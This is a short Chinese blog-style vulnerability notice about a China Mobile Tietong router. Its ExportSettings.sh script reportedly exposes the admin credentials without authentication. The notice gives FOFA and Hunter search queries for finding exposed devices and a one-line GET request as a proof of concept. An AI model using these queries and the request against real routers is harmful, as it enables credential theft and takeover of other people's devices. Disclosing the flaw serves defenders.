网站首页
编程语言
数据库
系统相关
其他分享
编程问答
ExportSettings
2024-05-14
中移铁通禹路由 ExportSettings 敏感信息泄露漏洞
漏洞描述:该漏洞由于cgi-bin/ExportSettings.sh未对用户进行身份验证,导致攻击者能够未授权获取到路由器设置信息,包含了后台管理员用户的账号和密码fofa:title="互联世界物联未来-登录"鹰图:web.body="互联世界物联未来-登录"POC:GET/cgi-bin/ExportSettings.sh漏洞复现: